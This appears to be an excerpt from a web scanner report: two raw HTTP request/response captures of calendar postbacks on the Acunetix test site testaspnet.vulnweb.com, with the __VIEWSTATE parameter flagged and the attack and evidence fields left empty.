Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1159 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,159 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8253&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABsdQc9oIHgJTRBYBBgAAF5s%2Bd9oIZGRkaHAFmjk7yG9Xga3w3wdaeLZ8VQU%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwK857WvCQKcisLvAQLiidrKBQL7pJ3HDAL7pJ3HDAL7pPGsCQL7pPGsCQL7pOXDAgL7pOXDAgLcy%2FfoBQLcy%2FfoBQLcy%2BuPDQLcy%2BuPDQLcy5%2BiBgLcy5%2BiBgLcy7P5DwLcy7P5DwLcy6ecBwLcy6ecBwLcy9swAtzL2zAC3MvP1wkC3MvP1wkC3Mvj6gIC3Mvj6gIC3MvX0w8C3MvX0w8C3MvL9ggC3MvL9ggCsdLVnwoCsdLVnwoCsdLJsgMCsdLJsgMCsdL9yQwCsdL9yQwCsdKR7AUCsdKR7AUCsdKFgw0CsdKFgw0CsdK5pgYCsdK5pgYCsdKt%2FQ8CsdKt%2FQ8CsdLBkQcCsdLBkQcCsdK1%2BQUCsdK1%2BQUCsdKpnA0CsdKpnA0Civm7BQKK%2BbsFAor5r9gJAor5r9gJAor5w%2FwCAor5w%2FwCAor595MKAor595MKAor567YDAor567YDAor5n80MAor5n80MAor5s%2BAFAor5s%2BAFAor5p4cNAor5p4cNAor5m%2BwLAor5m%2BwLAor5j4MDAor5j4MDAr%2BT%2B8QJAr%2BT%2B8QJAr%2BT75sBAr%2BT75sBAr%2BTg74KAr%2BTg74KAr%2BTt9UDAr%2BTt9UDAr%2BTq%2BgMAr%2BTq%2BgMAr%2BT34wEAr%2BT34wEAr%2BT86MNAr%2BT86MNAr%2BT58YGAr%2BT58YGAr%2BT268DAr%2BT268DSdUVdURDVljuq8webdoJ2U9xzy4%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:55:14 GMT Content-Length: 12565
Response Body - size: 12,565 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABsdQc9oIHgJTRBYBBgAAF5s+d9oIZGRkaHAFmjk7yG9Xga3w3wdaeLZ8VQU=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwK857WvCQKcisLvAQLiidrKBQL7pJ3HDAL7pJ3HDAL7pPGsCQL7pPGsCQL7pOXDAgL7pOXDAgLcy/foBQLcy/foBQLcy+uPDQLcy+uPDQLcy5+iBgLcy5+iBgLcy7P5DwLcy7P5DwLcy6ecBwLcy6ecBwLcy9swAtzL2zAC3MvP1wkC3MvP1wkC3Mvj6gIC3Mvj6gIC3MvX0w8C3MvX0w8C3MvL9ggC3MvL9ggCsdLVnwoCsdLVnwoCsdLJsgMCsdLJsgMCsdL9yQwCsdL9yQwCsdKR7AUCsdKR7AUCsdKFgw0CsdKFgw0CsdK5pgYCsdK5pgYCsdKt/Q8CsdKt/Q8CsdLBkQcCsdLBkQcCsdK1+QUCsdK1+QUCsdKpnA0CsdKpnA0Civm7BQKK+bsFAor5r9gJAor5r9gJAor5w/wCAor5w/wCAor595MKAor595MKAor567YDAor567YDAor5n80MAor5n80MAor5s+AFAor5s+AFAor5p4cNAor5p4cNAor5m+wLAor5m+wLAor5j4MDAor5j4MDAr+T+8QJAr+T+8QJAr+T75sBAr+T75sBAr+Tg74KAr+Tg74KAr+Tt9UDAr+Tt9UDAr+Tq+gMAr+Tq+gMAr+T34wEAr+T34wEAr+T86MNAr+T86MNAr+T58YGAr+T58YGAr+T268DAr+T268DSdUVdURDVljuq8webdoJ2U9xzy4=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8217')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">August 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8279')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:White" title="August 06">6</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8254')" style="color:Black" title="August 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8255')" style="color:Black" title="August 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8256')" style="color:Black" title="August 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8257')" style="color:Black" title="August 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8258')" style="color:Black" title="August 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8259')" style="color:Black" title="August 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8260')" style="color:Black" title="August 13">13</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8261')" style="color:Black" title="August 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8262')" style="color:Black" title="August 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8263')" style="color:Black" title="August 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8264')" style="color:Black" title="August 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8265')" style="color:Black" title="August 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8266')" style="color:Black" title="August 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8267')" style="color:Black" title="August 20">20</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8268')" style="color:Black" title="August 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8269')" style="color:Black" title="August 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8270')" style="color:Black" title="August 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8271')" style="color:Black" title="August 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8272')" style="color:Black" title="August 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8273')" style="color:Black" title="August 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8274')" style="color:Black" title="August 27">27</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8275')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8276')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8277')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8278')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8279')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8280')" style="color:Black" title="September 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8281')" style="color:Black" title="September 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8282')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8283')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8284')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8285')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8286')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8287')" style="color:Black" title="September 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8288')" style="color:Black" title="September 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1159 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,159 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8269&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABsdQc9oIHgJTRBYBBgAAs0HRg9oIZGRksxFQ6Cc4IMpKu8ZZ6%2BFSzgHEYcQ%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKh5fGTBQKcisLvAQLiidrKBQL7pJ3HDAL7pJ3HDAL7pPGsCQL7pPGsCQL7pOXDAgL7pOXDAgLcy%2FfoBQLcy%2FfoBQLcy%2BuPDQLcy%2BuPDQLcy5%2BiBgLcy5%2BiBgLcy7P5DwLcy7P5DwLcy6ecBwLcy6ecBwLcy9swAtzL2zAC3MvP1wkC3MvP1wkC3Mvj6gIC3Mvj6gIC3MvX0w8C3MvX0w8C3MvL9ggC3MvL9ggCsdLVnwoCsdLVnwoCsdLJsgMCsdLJsgMCsdL9yQwCsdL9yQwCsdKR7AUCsdKR7AUCsdKFgw0CsdKFgw0CsdK5pgYCsdK5pgYCsdKt%2FQ8CsdKt%2FQ8CsdLBkQcCsdLBkQcCsdK1%2BQUCsdK1%2BQUCsdKpnA0CsdKpnA0Civm7BQKK%2BbsFAor5r9gJAor5r9gJAor5w%2FwCAor5w%2FwCAor595MKAor595MKAor567YDAor567YDAor5n80MAor5n80MAor5s%2BAFAor5s%2BAFAor5p4cNAor5p4cNAor5m%2BwLAor5m%2BwLAor5j4MDAor5j4MDAr%2BT%2B8QJAr%2BT%2B8QJAr%2BT75sBAr%2BT75sBAr%2BTg74KAr%2BTg74KAr%2BTt9UDAr%2BTt9UDAr%2BTq%2BgMAr%2BTq%2BgMAr%2BT34wEAr%2BT34wEAr%2BT86MNAr%2BT86MNAr%2BT58YGAr%2BT58YGAr%2BT268DAr%2BT268DsrKEmhpjVYtKrroLwAFKixOZKAE%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:41:11 GMT Content-Length: 12565
Response Body - size: 12,565 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABsdQc9oIHgJTRBYBBgAAs0HRg9oIZGRksxFQ6Cc4IMpKu8ZZ6+FSzgHEYcQ=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKh5fGTBQKcisLvAQLiidrKBQL7pJ3HDAL7pJ3HDAL7pPGsCQL7pPGsCQL7pOXDAgL7pOXDAgLcy/foBQLcy/foBQLcy+uPDQLcy+uPDQLcy5+iBgLcy5+iBgLcy7P5DwLcy7P5DwLcy6ecBwLcy6ecBwLcy9swAtzL2zAC3MvP1wkC3MvP1wkC3Mvj6gIC3Mvj6gIC3MvX0w8C3MvX0w8C3MvL9ggC3MvL9ggCsdLVnwoCsdLVnwoCsdLJsgMCsdLJsgMCsdL9yQwCsdL9yQwCsdKR7AUCsdKR7AUCsdKFgw0CsdKFgw0CsdK5pgYCsdK5pgYCsdKt/Q8CsdKt/Q8CsdLBkQcCsdLBkQcCsdK1+QUCsdK1+QUCsdKpnA0CsdKpnA0Civm7BQKK+bsFAor5r9gJAor5r9gJAor5w/wCAor5w/wCAor595MKAor595MKAor567YDAor567YDAor5n80MAor5n80MAor5s+AFAor5s+AFAor5p4cNAor5p4cNAor5m+wLAor5m+wLAor5j4MDAor5j4MDAr+T+8QJAr+T+8QJAr+T75sBAr+T75sBAr+Tg74KAr+Tg74KAr+Tt9UDAr+Tt9UDAr+Tq+gMAr+Tq+gMAr+T34wEAr+T34wEAr+T86MNAr+T86MNAr+T58YGAr+T58YGAr+T268DAr+T268DsrKEmhpjVYtKrroLwAFKixOZKAE=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8217')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">August 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8279')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8254')" style="color:Black" title="August 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8255')" style="color:Black" title="August 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8256')" style="color:Black" title="August 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8257')" style="color:Black" title="August 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8258')" style="color:Black" title="August 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8259')" style="color:Black" title="August 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8260')" style="color:Black" title="August 13">13</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8261')" style="color:Black" title="August 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8262')" style="color:Black" title="August 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8263')" style="color:Black" title="August 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8264')" style="color:Black" title="August 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8265')" style="color:Black" title="August 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8266')" style="color:Black" title="August 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8267')" style="color:Black" title="August 20">20</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8268')" style="color:Black" title="August 21">21</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8269')" style="color:White" title="August 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8270')" style="color:Black" title="August 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8271')" style="color:Black" title="August 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8272')" style="color:Black" title="August 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8273')" style="color:Black" title="August 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8274')" style="color:Black" title="August 27">27</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8275')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8276')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8277')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8278')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8279')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8280')" style="color:Black" title="September 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8281')" style="color:Black" title="September 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8282')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8283')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8284')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8285')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8286')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8287')" style="color:Black" title="September 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8288')" style="color:Black" title="September 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
